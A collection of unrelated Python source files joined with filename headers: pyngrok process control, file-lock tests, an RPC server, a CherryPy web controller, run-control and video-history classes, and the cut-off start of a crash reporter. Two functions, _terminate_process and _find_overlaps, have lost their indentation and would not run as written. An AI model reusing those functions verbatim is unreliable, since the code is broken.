    :type ngrok_path: str
    """
    import errno

    if ngrok_path in _current_processes:
        ngrok_process = _current_processes[ngrok_path]

        logger.info("Killing ngrok process: {}".format(ngrok_process.proc.pid))

        try:
            ngrok_process.proc.kill()
        except OSError as e:
            # ESRCH ("no such process") means it was already killed externally;
            # nothing to do but clean up our bookkeeping. Using the symbolic
            # constant instead of the magic number 3 is portable; a bare raise
            # preserves the original traceback.
            if e.errno != errno.ESRCH:
                raise

        _current_processes.pop(ngrok_path, None)
    else:
        logger.debug("\"ngrok_path\" {} is not running a process".format(ngrok_path))
def _ensure_path_ready(ngrok_path):
    """
    Ensure the binary for :code:`ngrok` at the given path is ready to be started, raise a relevant
    exception if not.

    :param ngrok_path: The path to the :code:`ngrok` binary.
    """
    if os.path.exists(ngrok_path):
        # The binary exists; it just must not already be managed by us.
        if ngrok_path in _current_processes:
            raise PyngrokNgrokError("ngrok is already running for the \"ngrok_path\": {}".format(ngrok_path))
        return

    raise PyngrokNgrokError(
        "ngrok binary was not found. Be sure to call \"ngrok.ensure_ngrok_installed()\" first for "
        "\"ngrok_path\": {}".format(ngrok_path))
def _validate_config(config_path):
    """Load the YAML config at *config_path* and, when it contains anything,
    run it through the installer's schema validation."""
    with open(config_path, "r") as config_file:
        parsed = yaml.safe_load(config_file)

    if parsed is not None:
        validate_config(parsed)
def _terminate_process(process):
if process is None:
return
try:
process.terminate()
except OSError:
logger.debug("ngrok process already terminated: {}".format(process.pid))
def _start_process(pyngrok_config):
    """
    Start a :code:`ngrok` process with no tunnels. This will start the :code:`ngrok` web interface, against
    which HTTP requests can be made to create, interact with, and destroy tunnels.

    :param pyngrok_config: The :code:`pyngrok` configuration to use when interacting with the :code:`ngrok` binary.
    :type pyngrok_config: PyngrokConfig
    :return: The :code:`ngrok` process.
    :rtype: NgrokProcess
    """
    _ensure_path_ready(pyngrok_config.ngrok_path)

    # Validate whichever config file ngrok will actually read.
    if pyngrok_config.config_path is not None:
        _validate_config(pyngrok_config.config_path)
    else:
        _validate_config(conf.DEFAULT_NGROK_CONFIG_PATH)

    # Build the command line; "--log=stdout" lets us parse startup state below.
    start = [pyngrok_config.ngrok_path, "start", "--none", "--log=stdout"]
    if pyngrok_config.config_path:
        logger.info("Starting ngrok with config file: {}".format(pyngrok_config.config_path))
        start.append("--config={}".format(pyngrok_config.config_path))
    if pyngrok_config.auth_token:
        logger.info("Overriding default auth token")
        start.append("--authtoken={}".format(pyngrok_config.auth_token))
    if pyngrok_config.region:
        logger.info("Starting ngrok in region: {}".format(pyngrok_config.region))
        start.append("--region={}".format(pyngrok_config.region))

    proc = subprocess.Popen(start, stdout=subprocess.PIPE, universal_newlines=True)
    # Make sure the child is terminated when this interpreter exits.
    atexit.register(_terminate_process, proc)

    logger.info("ngrok process starting: {}".format(proc.pid))

    ngrok_process = NgrokProcess(proc, pyngrok_config)
    _current_processes[pyngrok_config.ngrok_path] = ngrok_process

    # Consume startup log lines until healthy, failed, or timed out.
    timeout = time.time() + pyngrok_config.startup_timeout
    while time.time() < timeout:
        line = proc.stdout.readline()
        ngrok_process._log_startup_line(line)

        if ngrok_process.healthy():
            logger.info("ngrok process has started: {}".format(ngrok_process.api_url))

            if pyngrok_config.monitor_thread:
                ngrok_process.start_monitor_thread()
            break
        elif ngrok_process.startup_error is not None or \
                ngrok_process.proc.poll() is not None:
            break

    if not ngrok_process.healthy():
        # If the process did not come up in a healthy state, clean up the state
        kill_process(pyngrok_config.ngrok_path)

        if ngrok_process.startup_error is not None:
            raise PyngrokNgrokError("The ngrok process errored on start: {}.".format(ngrok_process.startup_error),
                                    ngrok_process.logs,
                                    ngrok_process.startup_error)
        else:
            raise PyngrokNgrokError("The ngrok process was unable to start.", ngrok_process.logs)

    return ngrok_process
|
test_lock.py | """
Adapted from https://github.com/harlowja/fasteners/
"""
import itertools
import os
import random
import tempfile
import time
from multiprocessing import Process
from pathlib import Path
import more_itertools
import pytest
from diskcache import Cache
from diskcache import Deque
# noinspection PyProtectedMember
from pathos.pools import _ProcessPool as ProcessPool
from filedb.lock import FileLocked
from filedb.lock import ReaderWriterLock
PROCESS_COUNT = 20
class StopWatch(object):
    """A really basic stop watch."""

    def __init__(self, duration=None):
        self.duration = duration
        self.started_at = None
        self.stopped_at = None

    def start(self):
        """Begin (or restart) timing from now."""
        self.started_at = time.monotonic()
        self.stopped_at = None

    def elapsed(self):
        """Seconds since start(), frozen at the stop time once stopped."""
        end = self.stopped_at if self.stopped_at is not None else time.monotonic()
        return max(0.0, end - self.started_at)

    def leftover(self):
        """Remaining seconds of the configured duration, or None if unbounded."""
        if self.duration is None:
            return None
        return max(0.0, self.duration - self.elapsed())

    def expired(self):
        """True once elapsed time exceeds the configured duration."""
        return self.duration is not None and self.elapsed() > self.duration

    def __enter__(self):
        self.start()
        return self

    def __exit__(self, exc_type, exc_value, exc_tb):
        self.stopped_at = time.monotonic()
@pytest.fixture()
def disk_cache_dir():
    # Fresh temporary directory per test, removed automatically afterwards.
    with tempfile.TemporaryDirectory() as tmp_dir:
        yield tmp_dir
@pytest.fixture()
def lock_dir():
    # Separate temporary directory for the lock files, removed afterwards.
    with tempfile.TemporaryDirectory() as tmp_dir:
        yield tmp_dir
def test_doesnt_hang(lock_dir, disk_cache_dir):
    """10 readers and 10 writers across processes all acquire and release
    without deadlocking; each bumps its own counter exactly once."""
    def chaotic_locker(type_):
        # Pick the lock flavour from the type tag ('w' or 'r').
        lock = (ReaderWriterLock(lock_dir).write_lock if type_ == 'w' else
                ReaderWriterLock(lock_dir).read_lock)
        with lock():
            with Cache(disk_cache_dir) as dc_:
                dc_.incr(type_)

    pool = ProcessPool(PROCESS_COUNT)
    pool.map(chaotic_locker, ['r'] * 10 + ['w'] * 10)

    with Cache(disk_cache_dir) as dc:
        assert dc.get('w') == 10
        assert dc.get('r') == 10
def test_no_double_writers(disk_cache_dir, lock_dir):
    """Hammer the write lock from many processes for ~5s and verify the
    critical section was never entered by two writers at once."""
    watch = StopWatch(duration=5)
    watch.start()

    def acquire_check(dc_):
        with ReaderWriterLock(lock_dir).write_lock(timeout=None):
            # A second writer inside the section would observe active_count >= 1.
            if dc_.get('active_count', 0) >= 1:
                dc_.incr('dups_count')
            dc_.incr('active_count')
            time.sleep(random.random() / 100)
            dc_.decr('active_count')
            dc_.incr('visited_count')

    def run(_):
        with Cache(disk_cache_dir) as dc_:
            while not watch.expired():
                acquire_check(dc_)

    pool = ProcessPool(PROCESS_COUNT)
    pool.map(run, [() for _ in range(PROCESS_COUNT)], chunksize=1)

    with Cache(disk_cache_dir) as dc:
        assert dc.get('active_count') == 0
        assert dc.get('dups_count', default=0) == 0
        assert dc.get('visited_count') > 100
def test_no_concurrent_readers_writers(disk_cache_dir, lock_dir):
    """Mixed readers/writers for ~5s: a writer must never enter while any
    other holder (reader or writer) is inside the critical section."""
    watch = StopWatch(duration=5)
    watch.start()

    def acquire_check(dc_, reader):
        if reader:
            lock_func = ReaderWriterLock(lock_dir).read_lock
        else:
            lock_func = ReaderWriterLock(lock_dir).write_lock
        with lock_func(timeout=None):
            if not reader:
                # Writers must be alone: anyone else inside counts as a duplicate.
                if dc_.get('active_count', 0) >= 1:
                    dc_.incr('dups_count')
            dc_.incr('active_count')
            time.sleep(random.random() / 100)
            dc_.decr('active_count')
            dc_.incr('visited_count')

    def run(_):
        with Cache(disk_cache_dir) as dc_:
            while not watch.expired():
                acquire_check(dc_, random.choice([True, False]))

    pool = ProcessPool(PROCESS_COUNT)
    pool.map(run, [() for _ in range(PROCESS_COUNT)], chunksize=1)

    with Cache(disk_cache_dir) as dc:
        assert dc.get('active_count') == 0
        assert dc.get('dups_count', default=0) == 0
        assert dc.get('visited_count') > 10
def test_writer_releases_lock_upon_crash(lock_dir, disk_cache_dir):
    """A writer that crashes while holding the lock must still release it so
    a subsequent writer can acquire within the timeout."""
    def lock_(i, crash):
        with ReaderWriterLock(lock_dir).write_lock(timeout=5):
            with Cache(disk_cache_dir) as dc_:
                dc_.set(f'pid{i}', os.getpid())
            if crash:
                raise RuntimeError('')

    p1 = Process(target=lock_, args=(1, True))
    p2 = Process(target=lock_, args=(2, False))
    p1.start()
    p1.join()
    p2.start()
    p2.join()

    with Cache(disk_cache_dir) as dc:
        # Both child processes got through the critical section.
        assert dc.get('pid1') != dc.get('pid2')
    assert p1.exitcode != 0
    assert p2.exitcode == 0
def test_reader_releases_lock_upon_crash(lock_dir, disk_cache_dir):
    """A reader that crashes while holding the lock must still release it so
    a later writer can acquire within the timeout."""
    def read_lock_and_crash(i):
        with ReaderWriterLock(lock_dir).read_lock():
            with Cache(disk_cache_dir) as dc_:
                dc_.set(f'pid{i}', os.getpid())
            raise RuntimeError('')

    def write_lock(i):
        with ReaderWriterLock(lock_dir).write_lock(timeout=5):
            with Cache(disk_cache_dir) as dc_:
                dc_.set(f'pid{i}', os.getpid())

    p1 = Process(target=read_lock_and_crash, args=(1,))
    p2 = Process(target=write_lock, args=(2,))
    p1.start()
    p1.join()
    p2.start()
    p2.join()

    with Cache(disk_cache_dir) as dc:
        # Both child processes got through their critical sections.
        assert dc.get('pid1') != dc.get('pid2')
    assert p1.exitcode != 0
    assert p2.exitcode == 0
def test_reader_writer_chaotic(lock_dir, disk_cache_dir):
    """Shuffled mix of readers and writers, half of which raise inside the
    lock; every worker must still enter exactly once despite the crashes."""
    def chaotic_locker(type_, blow_up):
        lock = (ReaderWriterLock(lock_dir).write_lock if type_ == 'w' else
                ReaderWriterLock(lock_dir).read_lock)
        with lock():
            with Cache(disk_cache_dir) as dc_:
                dc_.incr(type_)
            if blow_up:
                raise RuntimeError()

    pool = ProcessPool(PROCESS_COUNT)
    # 10 cycles of (r/w) x (crash/no-crash) = 40 workers, 20 per lock type.
    users = list(more_itertools.ncycles(itertools.product(['r', 'w'], [True, False]), 10))
    random.shuffle(users)
    with pytest.raises(RuntimeError):
        pool.starmap(chaotic_locker, users)

    with Cache(disk_cache_dir) as dc:
        assert dc.get('w') == 20
        assert dc.get('r') == 20
def test_reader_to_writer(lock_dir):
    # Upgrading from a held read lock to a write lock is supported.
    rw = ReaderWriterLock(lock_dir)
    with rw.read_lock(timeout=1), rw.write_lock(timeout=1):
        pass
@pytest.mark.skip('Not supported!')
def test_reader_to_reader(lock_dir):
    # Re-entrant read locking is not supported by this lock implementation.
    rw = ReaderWriterLock(lock_dir)
    with rw.read_lock(timeout=1), rw.read_lock(timeout=1):
        pass
    # fails, as read lock is dropped after first exit
    with pytest.raises(FileLocked):
        with rw.read_lock(timeout=1):
            pass
@pytest.mark.skip('Not supported!')
def test_writer_to_reader(lock_dir):
    # Downgrading from write to read is not supported.
    rw = ReaderWriterLock(lock_dir)
    # fails to release second time, as is already released
    with rw.write_lock(timeout=1), rw.read_lock(timeout=1):
        pass
@pytest.mark.skip('Not supported!')
def test_writer_to_writer(lock_dir):
    # Re-entrant write locking is not supported.
    rw = ReaderWriterLock(lock_dir)
    # fails to release second time, as is already released
    with rw.write_lock(timeout=1), rw.write_lock(timeout=1):
        pass
def _find_overlaps(times, start, end):
overlaps = 0
for (s, e) in times:
if s >= start and e <= end:
overlaps += 1
return overlaps
def _spawn_variation(readers, writers, lock_dir, disk_cache_dir):
    """Run *readers* + *writers* worker processes that each hold their lock
    briefly, recording (enter, exit) monotonic times per lock type.

    Returns ``(writer_times, reader_times)`` as plain lists of tuples.
    """
    # Disk-backed deques so child processes can append across process
    # boundaries; one per lock type.
    times = {'w': Deque(directory=disk_cache_dir / 'w'),
             'r': Deque(directory=disk_cache_dir / 'r')}

    def func(type_):
        lock = (ReaderWriterLock(lock_dir).write_lock if type_ == 'w' else
                ReaderWriterLock(lock_dir).read_lock)
        with lock(timeout=5):
            enter_time = time.monotonic()
            time.sleep(random.random() / 100)
            exit_time = time.monotonic()
            times[type_].append((enter_time, exit_time))
            # time.sleep(0.0001)

    pool = ProcessPool(readers + writers)
    pool.map(func, ['w'] * writers + ['r'] * readers)
    return list(times['w']), list(times['r'])
def test_multi_reader_multi_writer(lock_dir, disk_cache_dir):
    writer_times, reader_times = _spawn_variation(10, 10, Path(lock_dir), Path(disk_cache_dir))

    assert len(writer_times) == 10
    assert len(reader_times) == 10
    # A writer's hold must exclude all readers and overlap only itself.
    for begin, finish in writer_times:
        assert _find_overlaps(reader_times, begin, finish) == 0
        assert _find_overlaps(writer_times, begin, finish) == 1
    # Readers must never overlap a writer's hold.
    for begin, finish in reader_times:
        assert _find_overlaps(writer_times, begin, finish) == 0
def test_multi_reader_single_writer(lock_dir, disk_cache_dir):
    writer_times, reader_times = _spawn_variation(9, 1, Path(lock_dir), Path(disk_cache_dir))

    assert len(writer_times) == 1
    assert len(reader_times) == 9
    # The single writer must have run with no reader inside its window.
    begin, finish = writer_times[0]
    assert _find_overlaps(reader_times, begin, finish) == 0
def test_multi_writer(lock_dir, disk_cache_dir):
    writer_times, reader_times = _spawn_variation(0, 10, Path(lock_dir), Path(disk_cache_dir))

    assert len(writer_times) == 10
    assert len(reader_times) == 0
    # Each writer window overlaps exactly one writer interval: itself.
    for begin, finish in writer_times:
        assert _find_overlaps(writer_times, begin, finish) == 1
|
server.py | import logging
import time
import ssl
import threading
from msgpack import packb, unpackb
from gevent.server import StreamServer
from prometheus_client import Summary, Counter
import arrpc.metrics as m
from arrpc.error import AuthException, RpcException
from arrpc.utils import recvall, verify_msg
from arrpc import logger
class Server(object):
    """MessagePack-RPC server on a gevent StreamServer, with optional TLS,
    HMAC message signing and Prometheus metrics."""

    def __init__(self, host: str, port: int, handler, debug: bool = False,
                 tls_certfile: str = None, tls_keyfile: str = None, auth_secret: str = None,
                 metrics: bool = False, metrics_port: int = 9095):
        self.host = host
        self.port = port
        self.handler = handler
        self.auth_secret = auth_secret
        self.ssl_context = None
        if tls_certfile and tls_keyfile:
            # TLS is enabled only when both certificate and key are supplied.
            self.ssl_context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
            self.ssl_context.load_cert_chain(tls_certfile, tls_keyfile)
        if debug:
            logger.setLevel(logging.DEBUG)
        self.metrics = metrics
        self.metrics_port = metrics_port
        if metrics:
            # Shared metric objects are created at most once per process,
            # guarded by the module-level mutex so multiple Server instances
            # reuse the same collectors.
            with m.metrics_mutex:
                if not m.shared_hostname_label:
                    m.shared_hostname_label = m.hostname()
                if not m.shared_namespace_label:
                    m.shared_namespace_label = m.k8s_namespace()
                if not m.shared_metrics["arrpc_server_metric_seconds"]:
                    m.shared_metrics["arrpc_server_metric_seconds"] = Summary(
                        "arrpc_server_req_seconds",
                        "Time spent handling server requests",
                        ("hostname", "k8s_namespace", "remote_address", "handler_func", "signed_payload", "tls")
                    )
                if not m.shared_metrics["arrpc_server_metric_bytes"]:
                    m.shared_metrics["arrpc_server_metric_bytes"] = Summary(
                        "arrpc_server_req_bytes",
                        "Size of server requests in bytes",
                        ("hostname", "k8s_namespace", "remote_address", "handler_func", "signed_payload", "tls")
                    )
                if not m.shared_metrics["arrpc_server_metric_errors"]:
                    m.shared_metrics["arrpc_server_metric_errors"] = Counter(
                        "arrpc_server_errors",
                        "RPC server errors",
                        ("hostname", "k8s_namespace", "remote_address", "handler_func", "signed_payload", "tls", "reason")
                    )

    def start(self, background: bool = False):
        """Start serving. Blocks forever unless *background* is True, in
        which case serving happens on a daemon thread."""
        def _gevent_handler(socket, address):
            # Per-connection loop: read one framed message, verify/dispatch,
            # send one response; repeats until the peer disconnects.
            logger.debug(f"Connection from {address}")
            while True:
                msg = None
                try:
                    msg = recvall(socket)
                except ConnectionResetError:
                    # Treated the same as a clean close below (msg is None).
                    pass
                if not msg:
                    logger.debug(f"Connection from {address} closed")
                    break
                if self.metrics:
                    start_time = time.time()
                try:
                    msg_unpacked = unpackb(msg, raw=False)
                except Exception as e:
                    logger.debug(f"Failed to unpack message, most likely not MessagePack: {e}")
                    msg_unpacked = None
                if msg_unpacked:
                    logger.debug(f"Received message from {address}")
                    response = None
                    if self.auth_secret:
                        # Signed-payload mode: reject messages whose HMAC
                        # doesn't verify, returning an error string instead
                        # of invoking the handler.
                        try:
                            msg_unpacked = verify_msg(msg_unpacked, self.auth_secret)
                            logger.debug(f"Verified message signature")
                        except AuthException as e:
                            logger.debug(e)
                            error_msg = "Invalid or missing message signature, make sure 'auth_secret' is set/correct"
                            if self.metrics:
                                m.shared_metrics["arrpc_server_metric_errors"].labels(
                                    m.shared_hostname_label,  # hostname
                                    m.shared_namespace_label,  # k8s_namespace
                                    address[0],  # remote_address
                                    self.handler.__name__,  # handler_func
                                    self.auth_secret is not None,  # signed_payload
                                    self.ssl_context is not None,  # tls
                                    error_msg  # reason
                                ).inc()
                            response = f"arrpc.error.AuthException: {error_msg}"
                    if not response:
                        logger.debug(f"Passing message to handler function")
                        try:
                            response = self.handler(msg_unpacked)
                        except RpcException as e:
                            if self.metrics:
                                m.shared_metrics["arrpc_server_metric_errors"].labels(
                                    m.shared_hostname_label,  # hostname
                                    m.shared_namespace_label,  # k8s_namespace
                                    address[0],  # remote_address
                                    self.handler.__name__,  # handler_func
                                    self.auth_secret is not None,  # signed_payload
                                    self.ssl_context is not None,  # tls
                                    str(e)  # reason
                                ).inc()
                            response = f"arrpc.error.RpcException: {e}"
                    response_packed = packb(response, use_bin_type=True)
                    try:
                        socket.sendall(response_packed)
                        logger.debug(f"Sent response back to {address}")
                    except Exception as e:
                        logger.debug(f"Failed to send response back to {address}: {e}")
                        break
                    if self.metrics:
                        m.shared_metrics["arrpc_server_metric_seconds"].labels(
                            m.shared_hostname_label,  # hostname
                            m.shared_namespace_label,  # k8s_namespace
                            address[0],  # remote_address
                            self.handler.__name__,  # handler_func
                            self.auth_secret is not None,  # signed_payload
                            self.ssl_context is not None  # tls
                        ).observe(time.time() - start_time)
                        m.shared_metrics["arrpc_server_metric_bytes"].labels(
                            m.shared_hostname_label,  # hostname
                            m.shared_namespace_label,  # k8s_namespace
                            address[0],  # remote_address
                            self.handler.__name__,  # handler_func
                            self.auth_secret is not None,  # signed_payload
                            self.ssl_context is not None  # tls
                        ).observe(len(msg))

        if self.metrics:
            m.start_metrics_server(self.metrics_port)
        if self.ssl_context:
            server = StreamServer((self.host, self.port), _gevent_handler,
                                  ssl_context=self.ssl_context)
            logger.info(f"Listening on TCP/TLS {self.host}:{self.port}\n")
        else:
            server = StreamServer((self.host, self.port), _gevent_handler)
            logger.info(f"Listening on TCP {self.host}:{self.port}\n")
        if background:
            t = threading.Thread(target=server.serve_forever)
            # NOTE(review): Thread.setDaemon() is deprecated since Python 3.10
            # in favour of `t.daemon = True` -- consider updating.
            t.setDaemon(True)
            t.start()
        else:
            server.serve_forever()
|
root.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Root for webserver. Specifies frontpage, errorpage (default),
and pages for restarting and shutting down server.
"""
import os
import sys
import cherrypy
import htpc
import logging
from threading import Thread
from cherrypy.lib.auth2 import *
def do_restart():
    """Re-exec the current Python interpreter with the same arguments,
    replacing this process (used by Root.restart on a helper thread)."""
    arguments = sys.argv[:]
    arguments.insert(0, sys.executable)
    if sys.platform == 'win32':
        # Quote each argument so os.execv on Windows keeps args with
        # spaces intact.
        arguments = ['"%s"' % arg for arg in arguments]
    # NOTE(review): os.chdir(os.getcwd()) is a no-op as written -- presumably
    # meant to pin/refresh the working directory before exec; confirm intent.
    os.chdir(os.getcwd())
    cherrypy.engine.exit()
    os.execv(sys.executable, arguments)
class RestrictedArea:
    # All methods in this controller (and subcontrollers) are
    # open only to members of the admin group.
    _cp_config = {
        'auth.require': [member_of('admin')]
    }
class Root:
    """CherryPy root controller: front page, catch-all error page, and
    authenticated endpoints to restart, shut down, or log out."""

    def __init__(self):
        """Do nothing on load beyond grabbing the module logger."""
        self.logger = logging.getLogger('htpc.root')

    # Mounted sub-controllers: login handling and the admin-only area.
    auth = AuthController()
    restricted = RestrictedArea()

    @cherrypy.expose()
    @require()
    def index(self):
        """ Load template for frontpage """
        return htpc.LOOKUP.get_template('dash.html').render(scriptname='dash')

    @cherrypy.expose()
    def default(self, *args, **kwargs):
        """ Show error if no matching page can be found """
        # Fixed typo in the user-facing message ("occured" -> "occurred").
        return "An error occurred"

    @cherrypy.expose()
    @require(member_of("admin"))
    def shutdown(self):
        """ Shutdown CherryPy and exit script """
        self.logger.info("Shutting down htpc-manager.")
        cherrypy.engine.exit()
        return "HTPC Manager has shut down"

    @cherrypy.tools.json_out()
    @cherrypy.expose()
    @require()
    def restart(self):
        """ Shutdown script and rerun with the same variables """
        self.logger.info("Restarting htpc-manager.")
        # Restart on a helper thread so this request can still return.
        Thread(target=do_restart).start()
        return "Restart in progress."

    @cherrypy.expose()
    @require()
    def logout(self, from_page="/"):
        """Clear the session login and redirect to the web root."""
        sess = cherrypy.session
        username = sess.get(SESSION_KEY, None)
        sess[SESSION_KEY] = None
        if username:
            cherrypy.request.login = None
        raise cherrypy.HTTPRedirect(str(htpc.WEBDIR) or from_page)
|
_RunControl.py | #-----------------------------------------------------------------------------
# Title : PyRogue base module - Run Control Device Class
#-----------------------------------------------------------------------------
# This file is part of the rogue software platform. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the rogue software platform, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import pyrogue as pr
import threading
import time
class RunControl(pr.Device):
    """Special base class to control runs. """

    def __init__(self, *, hidden=True, rates=None, states=None, cmd=None, **kwargs):
        """Initialize device class"""

        if rates is None:
            rates={1:'1 Hz', 10:'10 Hz'}

        if states is None:
            states={0:'Stopped', 1:'Running'}

        pr.Device.__init__(self, hidden=hidden, **kwargs)

        # Initial run state is the first key declared in the states enum.
        value = [k for k,v in states.items()][0]

        self._thread = None   # worker thread, created when a run starts
        self._cmd = cmd       # optional callable fired once per run tick

        self.add(pr.LocalVariable(
            name='runState',
            value=value,
            mode='RW',
            disp=states,
            localSet=self._setRunState,
            description='Run state of the system.'))

        # Initial run rate is the first key declared in the rates enum.
        value = [k for k,v in rates.items()][0]

        self.add(pr.LocalVariable(
            name='runRate',
            value=value,
            mode='RW',
            disp=rates,
            localSet=self._setRunRate,
            description='Run rate of the system.'))

        self.add(pr.LocalVariable(
            name='runCount',
            value=0,
            typeStr='UInt32',
            mode='RO',
            pollInterval=1,
            description='Run Counter updated by run thread.'))

    def _setRunState(self,value,changed):
        """
        Set run state. Re-implement in sub-class.
        Enum of run states can also be overridden.
        Underlying run control must update runCount variable.
        """
        if changed:
            if self.runState.valueDisp() == 'Running':
                #print("Starting run")
                self._thread = threading.Thread(target=self._run)
                self._thread.start()
            elif self._thread is not None:
                #print("Stopping run")
                # The worker loop exits on its own once runState is no longer
                # 'Running'; join() waits for the in-flight iteration to finish.
                self._thread.join()
                self._thread = None

    def _setRunRate(self,value):
        """
        Set run rate. Re-implement in sub-class if necessary.
        """
        pass

    def _run(self):
        """Worker thread: fire _cmd at runRate and bump runCount until stopped."""
        #print("Thread start")
        self.runCount.set(0)

        while (self.runState.valueDisp() == 'Running'):
            time.sleep(1.0 / float(self.runRate.value()))
            if self._cmd is not None:
                self._cmd()

            with self.runCount.lock:
                self.runCount.set(self.runCount.value() + 1,write=False)
|
past_video_image.py | import multiprocessing
# Copyright 2020 Wearless Tech Inc All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from .chunker import Chunker, ChImage
from .log import logger
from .ch_errors import VideoFailedToStart, VideoHistoryNotFound, InfrequentException
import av
import numpy
import datetime
import operator
import multiprocessing as mp
import sys
class PastVideoImage:
    """Replays historical video frames from a Redis stream, decoding them in
    a background process and handing them out one ChImage at a time."""

    def __init__(self, redis_conn, stream_name, audio_stream_name, codec=av.Codec('h264', 'r').create()):
        # NOTE(review): the default codec object is created once at import
        # time and shared across instances -- confirm that is intended.
        self.__redis_conn = redis_conn
        self.__stream_name = stream_name
        self.__audio_stream_name = audio_stream_name
        self.__last_history_query = None           # last Redis stream ID read
        self.__last_history_query_timestamp = 0    # ms timestamp of that ID
        self.__history_chunker = None              # decoder for fetched packets
        self.__last_history_request_time = 0       # Redis server time of last call
        self.__history_queue = mp.Queue()          # decoded frames to hand out
        self.__is_first_run = True
        self.__lock = mp.Lock()

    def get_latest_image_from(self, fromtimestamp, totimestamp) -> ChImage:
        """Return the next decoded frame between the two ms timestamps, or
        None once the history range is exhausted. Raises InfrequentException
        when calls are more than 10 s apart."""
        # Use Redis server time so clients with skewed clocks stay consistent.
        redis_time = self.__redis_conn.time()
        redis_time = int(redis_time[0] + (redis_time[1] / 1000000)) * 1000
        # NOTE(review): a new Process object is built on every call, but only
        # the first one is ever started (guarded by __is_first_run below).
        self.__process = mp.Process(target=self.fetch_next_frames, args=(totimestamp,True,))
        with self.__lock:
            if self.__last_history_request_time == 0:
                self.__last_history_request_time = redis_time
            if self.__last_history_query_timestamp == 0:
                # First request of a session: start reading from fromtimestamp.
                self.__last_history_query_timestamp = fromtimestamp
                self.__last_history_query = str(self.__last_history_query_timestamp)
                self.__history_chunker = Chunker(codec=av.Codec('h264', 'r').create())
                self.__history_queue = mp.Queue()
            else:
                # check if more than 10 seconds between 2 queries, throw exception
                last_query_diff = abs(self.__last_history_request_time - redis_time)
                if last_query_diff > 10*1000:
                    self.__history_cleanup()
                    raise InfrequentException
                self.__last_history_request_time = redis_time
        if self.__is_first_run:
            self.__process.start()
            self.__is_first_run = False
        while True:
            if self.__history_queue.qsize() > 0:
                img = self.__history_queue.get()
                if img.timestamp == 0 and img.data is None:
                    # sentinel img received (no more data)
                    break
                else:
                    return img
            else:
                time.sleep(0.1)
        self.__history_cleanup()
        return None

    def stop_now(self):
        """Force the fetcher loop to stop by pushing the history cursor past
        any possible totimestamp."""
        with self.__lock:
            self.__last_history_query_timestamp = sys.maxsize

    def fetch_next_frames(self, totimestamp, is_forward_process=False):
        """Background worker: read packets from the Redis stream, decode them
        and feed the frame queue until totimestamp is reached."""
        while True:
            if self.__last_history_query_timestamp < totimestamp:
                # Throttle: keep at most ~10 decoded frames buffered.
                if self.__history_queue.qsize() < 10:
                    buffer = self.__redis_conn.xread({self.__stream_name:self.__last_history_query}, block=1000, count=10)
                    if len(buffer) > 0:
                        arr = buffer[0]
                        inner_buffer = arr[1]
                        # Advance the cursor to the last stream ID consumed.
                        last = inner_buffer[-1]
                        with self.__lock:
                            self.__last_history_query = last[0]
                            self.__last_history_query_timestamp = int(self.__last_history_query.decode('utf-8').split("-")[0])
                        frames = self.__history_chunker.frames(inner_buffer)
                        if len(frames) > 0:
                            for frame_ts, frame in frames.items():
                                d = frame.to_ndarray(format="bgr24")
                                chImage = ChImage(data=d, width=frame.width, height=frame.height, timestamp=frame_ts, frame_type=frame.pict_type.name)
                                self.__history_queue.put(chImage)
                    else:
                        # No new data: forward mode keeps polling, replay stops.
                        if is_forward_process:
                            time.sleep(0.15)
                        else:
                            break
            else:
                # Range exhausted: emit the sentinel so the consumer unblocks.
                sentinel_img = ChImage(data=None, width=0, height=0, timestamp=0)
                self.__history_queue.put(sentinel_img)
                self.__history_queue.close()
                break

    def __history_cleanup(self):
        # Reset all replay state so the next request starts a fresh session.
        with self.__lock:
            self.__last_history_query_timestamp = 0
            self.__last_history_query = None
            self.__last_history_request_time = 0
            self.__history_chunker = None
            if self.__history_queue is not None:
                self.__history_queue.close()
crashreporter.py | #
# This file is:
# Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com>
#
# MIT License
from . import utils
from . import gui
from electroncash.i18n import _
from .uikit_bindings import *
from .custom_objc import *
import json, traceback, requests, sys
from electroncash import PACKAGE_VERSION
# HTML template shown in the report preview and used to render the final
# report text; placeholders are filled by _get_report_string() via
# str.format() with the dicts from _get_additional_info()/_get_traceback_info().
issue_template = """<font face=arial color="#414141">
<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electron Cash version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
</font>
"""
# BauerJ's testing server:
#report_server = "https://crashhubtest.bauerj.eu/crash"
# "Live" (Marcel's server) — endpoint the JSON crash report is POSTed to.
report_server = "https://crashhub.electroncash.org/crash"
# The single live CrashReporterVC instance (set in viewDidLoad, cleared in
# dealloc); None whenever no crash-reporter screen is showing.
Singleton = None
class CrashReporterVC(CrashReporterBase):
    """View controller for the crash-reporter screen.

    Only one instance exists at a time (tracked by the module-level
    ``Singleton``). The exception to report is attached via Set() /
    read via _Get() using the nspy_* side-table in utils.
    """
    @objc_method
    def dealloc(self) -> None:
        # Drop the singleton reference and any attached exc_info before
        # handing control to the ObjC deallocator.
        global Singleton
        Singleton = None
        utils.nspy_pop(self)
        send_super(__class__, self, 'dealloc')
    @objc_method
    def viewDidLoad(self) -> None:
        """Set up static texts, fonts and register self as the singleton."""
        send_super(__class__, self, 'viewDidLoad')
        global Singleton
        Singleton = self
        self.report.text = ""
        self.reportTit.setText_withKerning_(_("Report Contents"), utils._kern)
        # .translate({ord(':'):None}) strips the trailing colon from the
        # translated string so it can be reused as a bare title.
        self.descTit.setText_withKerning_(_("Please briefly describe what led to the error (optional):").translate({ord(':'):None}), utils._kern)
        utils.uilabel_replace_attributed_text(self.errMsg,
